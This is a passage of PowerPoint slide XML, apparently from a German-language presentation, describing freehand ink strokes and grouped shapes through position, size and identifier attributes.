                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F0F132C4-58E2-48DA-8BFB-2CA8D2A0FB4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545126" y="2080394"/>
                    <a:ext cx="138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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="2709286" y="2049794"/>
                  <a:ext cx="194400" cy="154080"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="31" name="Freihand 30">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A08AF55-95D6-4F7B-A656-39267DA1DAD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700286" y="2040794"/>
                    <a:ext cx="212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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="2043740" y="1917214"/>
                <a:ext cx="392040" cy="276120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1027" name="Freihand 1026">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4AC7452B-D236-4EE3-B0DE-A9C9C40B5B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34740" y="1908574"/>
                  <a:ext cx="409680" cy="293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8" name="Gruppieren 1037">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{372EC0FC-DC80-4021-8178-1503278097E2}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="1165452" y="1818119"/>
              <a:ext cx="756360" cy="493560"/>
              <a:chOff x="1002886" y="1786634"/>
              <a:chExt cx="75636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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1002886" y="1786634"/>
                  <a:ext cx="67320" cy="483840"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="1028" name="Freihand 1027">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{609CDC72-C21C-42C5-9F39-8BBFD63AD86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886" y="1777994"/>
                    <a:ext cx="84960" cy="50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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1037086" y="1794554"/>
                  <a:ext cx="567000" cy="39960"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="1029" name="Freihand 1028">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A6B0E63-AA41-46DE-8C35-7234C786828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8086" y="1785554"/>
                    <a:ext cx="58464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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1029526" y="2200274"/>
                  <a:ext cx="723600" cy="79920"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="1030" name="Freihand 1029">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A2764DD4-AF1D-4C61-892C-6601E7ABA4B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020886" y="2191634"/>
                    <a:ext cx="74124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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1580326" y="1794554"/>
                  <a:ext cx="178920" cy="408600"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="1032" name="Freihand 1031">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CB05AEB2-D161-4147-9F7D-B0D25ED9ADF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71686" y="1785554"/>
                    <a:ext cx="19656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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1122766" y="1883834"/>
                  <a:ext cx="70560" cy="74520"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="1034" name="Freihand 1033">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{834C08D5-602A-434C-A909-285783B7AD4E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13766" y="1875194"/>
                    <a:ext cx="882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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1235806" y="1897154"/>
                  <a:ext cx="92880" cy="55440"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="1035" name="Freihand 1034">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6507605B-4BB3-45D4-AF7B-9FC35465E334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227166" y="1888154"/>
                    <a:ext cx="110520" cy="7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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1363246" y="1887794"/>
                  <a:ext cx="306720" cy="85680"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="1036" name="Freihand 1035">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{38FD27CC-EA81-4513-9991-3BFA227DCEAD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354246" y="1879154"/>
                    <a:ext cx="32436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14:cNvPr>
                  <p14:cNvContentPartPr/>
                  <p14:nvPr/>
                </p14:nvContentPartPr>
                <p14:xfrm>
                  <a:off x="1378726" y="1885994"/>
                  <a:ext cx="291600" cy="51480"/>
                </p14:xfrm>
              </p:contentPart>
            </mc:Choice>
            <mc:Fallback xmlns="">
              <p:pic>
                <p:nvPicPr>
                  <p:cNvPr id="1037" name="Freihand 1036">
                    <a:extLst>
                      <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                        <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E843700E-C968-4F95-BA55-E0E94E73F03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369726" y="1876994"/>
                    <a:ext cx="309240" cy="6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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7566640" y="1741758"/>
              <a:ext cx="1633680" cy="185400"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1040" name="Freihand 1039">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B583D10-0370-43BE-BF98-6A5509CDB6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57640" y="1732775"/>
                <a:ext cx="1651320" cy="203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14:cNvPr>
              <p14:cNvContentPartPr/>
              <p14:nvPr/>
            </p14:nvContentPartPr>
            <p14:xfrm>
              <a:off x="7554040" y="1759038"/>
              <a:ext cx="213840" cy="232560"/>
            </p14:xfrm>
          </p:contentPart>
        </mc:Choice>
        <mc:Fallback xmlns="">
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="1041" name="Freihand 1040">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A4A1109-FDB3-4AC1-A37E-3B7188669C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055" y="1750038"/>
                <a:ext cx="231450" cy="25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BB1654B-EB5B-4F60-8E83-1BAC18D5E629}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm rot="176866">
            <a:off x="7721800" y="1338558"/>
            <a:ext cx="1788480" cy="311400"/>
            <a:chOff x="7364446" y="2557754"/>
            <a:chExt cx="17884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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7364446" y="2699594"/>
                <a:ext cx="31320" cy="140040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1042" name="Freihand 1041">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8143ED6C-E37E-4729-B403-EBAB5A9473D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5446" y="2690594"/>
                  <a:ext cx="48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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7445806" y="2734514"/>
                <a:ext cx="82080" cy="88200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1043" name="Freihand 1042">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4FA81A7C-4414-471E-B89D-DC4BE1437E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37166" y="2725874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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7488286" y="2730194"/>
                <a:ext cx="129960" cy="138960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1045" name="Freihand 1044">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{73400DD1-547D-41CD-91DF-E2B33DD1AE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9286" y="2721194"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7577566" y="2658194"/>
                <a:ext cx="8280" cy="18360"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1046" name="Freihand 1045">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{91EA3815-9D8C-43BA-A9D3-AAA085ADEDA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68926" y="2649554"/>
                  <a:ext cx="25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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7634806" y="2704994"/>
                <a:ext cx="133560" cy="97920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1047" name="Freihand 1046">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1794CD0-E234-441A-9512-7CF67142DB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25806" y="26963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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7778086" y="2699954"/>
                <a:ext cx="133920" cy="86040"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1048" name="Freihand 1047">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1D5BBDD0-0DF9-49E2-AC12-E598CCAC2E1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9086" y="2690954"/>
                  <a:ext cx="15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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7950166" y="2577554"/>
                <a:ext cx="7200" cy="186120"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1049" name="Freihand 1048">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{84A1CCAD-56C3-4F9D-9ADB-A0804E36E1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41166" y="2568914"/>
                  <a:ext cx="24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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7868806" y="2655674"/>
                <a:ext cx="136080" cy="11880"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1050" name="Freihand 1049">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{132FF0C7-FA26-41BE-8DE5-A1596C7FC08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59806" y="2646674"/>
                  <a:ext cx="153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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8125126" y="2661074"/>
                <a:ext cx="121680" cy="169920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1055" name="Freihand 1054">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E21A8EE3-DA38-4C41-84F3-622B7483B0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6126" y="2652434"/>
                  <a:ext cx="139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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8295046" y="2679434"/>
                <a:ext cx="73800" cy="5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0E77CFA3-91A9-4BA8-AEAF-A4272B302C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86406" y="2670434"/>
                  <a:ext cx="91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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8361286" y="2671874"/>
                <a:ext cx="23760" cy="727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A2819F92-C967-4A38-9151-D33B77A593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52646" y="2663234"/>
                  <a:ext cx="41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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8435086" y="2669354"/>
                <a:ext cx="78120" cy="493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18956C52-381C-46A1-B1E1-0E59B2BFD7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26086" y="2660714"/>
                  <a:ext cx="95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28520" cy="155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92048796-4F6A-4E76-AD3B-5394C20754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22486" y="2643434"/>
                  <a:ext cx="14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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8609686" y="2580074"/>
                <a:ext cx="70200" cy="1569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00B0862-C9BA-4F7D-9244-B5746693633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0686" y="2571074"/>
                  <a:ext cx="8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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8667646" y="2678354"/>
                <a:ext cx="101160" cy="604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95DFD61E-EC0E-41A6-A11B-79679D702F7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59006" y="2669714"/>
                  <a:ext cx="118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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8803366" y="2672954"/>
                <a:ext cx="97920" cy="802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2702BD7-0EB2-4A27-A0BA-1ED42A4E12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94726" y="2664314"/>
                  <a:ext cx="115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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8927566" y="2686634"/>
                <a:ext cx="11520" cy="7488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198A0111-0FFA-4037-9AF9-65E766BEA89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18926" y="2677634"/>
                  <a:ext cx="29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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="8953846" y="2673674"/>
                <a:ext cx="127080" cy="7704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E9D4367E-138B-44C7-B60A-07AC9CF17B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45206" y="2665034"/>
                  <a:ext cx="144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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="9109726" y="2557754"/>
                <a:ext cx="43200" cy="1782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94633190-E9BC-439C-92EB-8799F3EA7C3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101086" y="2548754"/>
                  <a:ext cx="608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BA5B70B-C698-45F4-9C76-AB4D89C347DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="7438480" y="1465638"/>
            <a:ext cx="171000" cy="128880"/>
            <a:chOff x="7081126" y="2684834"/>
            <a:chExt cx="17100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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7081126" y="2684834"/>
                <a:ext cx="105120" cy="126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E059C0F-158C-49F2-89BC-60F5B0774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72486" y="2675834"/>
                  <a:ext cx="12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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="7245286" y="2800754"/>
                <a:ext cx="6840" cy="1296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ED6EB207-F4CA-40C6-B3E9-6370DDC4465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36286" y="279211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4" name="Gruppieren 1073">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9C573F4E-EF79-4D61-8FC6-13F9F5B4B4F3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3384286" y="1231998"/>
            <a:ext cx="1951560" cy="692280"/>
            <a:chOff x="3384286" y="2451194"/>
            <a:chExt cx="195156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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3485086" y="2800394"/>
                <a:ext cx="1767600" cy="283680"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="63" name="Freihand 62">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E2E88796-B342-424D-8FC2-9B8519805BC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76446" y="2791754"/>
                  <a:ext cx="178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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="5098966" y="2873474"/>
                <a:ext cx="236880" cy="270000"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1056" name="Freihand 1055">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{66D8633C-8E9F-4C3D-8D8E-568EF6D90AC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089966" y="2864834"/>
                  <a:ext cx="254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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3384286" y="2604194"/>
                <a:ext cx="132120" cy="199800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1058" name="Freihand 1057">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{AB273001-A16C-4AD9-9796-0223379ABA7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75286" y="2595194"/>
                  <a:ext cx="149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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3613246" y="2743514"/>
                <a:ext cx="4320" cy="6840"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1059" name="Freihand 1058">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{00AC012A-64DB-4C61-9783-B2682F421D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04246" y="2734874"/>
                  <a:ext cx="21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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3690646" y="2577914"/>
                <a:ext cx="43200" cy="129240"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1060" name="Freihand 1059">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{89D16D86-70D5-417E-BAA6-4214A51B93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682006" y="2568914"/>
                  <a:ext cx="60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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3656446" y="2530754"/>
                <a:ext cx="176040" cy="191520"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1061" name="Freihand 1060">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3801F228-B5C3-4FC4-B83B-8EC58C31AE1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47806" y="2521754"/>
                  <a:ext cx="193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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3884686" y="2580074"/>
                <a:ext cx="74160" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1062" name="Freihand 1061">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{10356E94-DD33-45FB-8150-340723AD667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876046" y="2571074"/>
                  <a:ext cx="91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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="3981526" y="2581514"/>
                <a:ext cx="123480" cy="70920"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1063" name="Freihand 1062">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4C5550AF-70D9-4EF4-93E5-98B3C484E12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2886" y="2572874"/>
                  <a:ext cx="141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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4137406" y="2528234"/>
                <a:ext cx="112680" cy="94320"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1064" name="Freihand 1063">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5254A691-06A8-4052-AA4A-BAA99813EC2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8406" y="2519594"/>
                  <a:ext cx="130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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4290406" y="2521034"/>
                <a:ext cx="79560" cy="84960"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1065" name="Freihand 1064">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{4D48C7C5-0236-49BD-A2DE-B69EB16EDF6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81406" y="2512394"/>
                  <a:ext cx="97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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4377166" y="2539034"/>
                <a:ext cx="113040" cy="80640"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1066" name="Freihand 1065">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0C192D8D-431D-4FCA-947B-8C959CAEC7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68166" y="2530394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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4551766" y="2451194"/>
                <a:ext cx="225360" cy="194400"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1068" name="Freihand 1067">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A21CFCA1-E033-400C-8CE4-DB141696989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43126" y="2442554"/>
                  <a:ext cx="243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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4598566" y="2558474"/>
                <a:ext cx="109080" cy="19800"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1069" name="Freihand 1068">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8AEA6F07-2D91-4E40-A89C-504C3389AC4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9566" y="2549834"/>
                  <a:ext cx="126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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
              </p14:nvContentPartPr>
              <p14:xfrm>
                <a:off x="4809166" y="2547314"/>
                <a:ext cx="109800" cy="169200"/>
              </p14:xfrm>
            </p:contentPart>
          </mc:Choice>
          <mc:Fallback xmlns="">
            <p:pic>
              <p:nvPicPr>
                <p:cNvPr id="1070" name="Freihand 1069">
                  <a:extLst>
                    <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                      <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9806DEE0-6569-4D42-96BE-46FE6EBB50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00166" y="2538314"/>
                  <a:ext cx="127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14:cNvPr>
                <p14:cNvContentPartPr/>
                <p14:nvPr/>
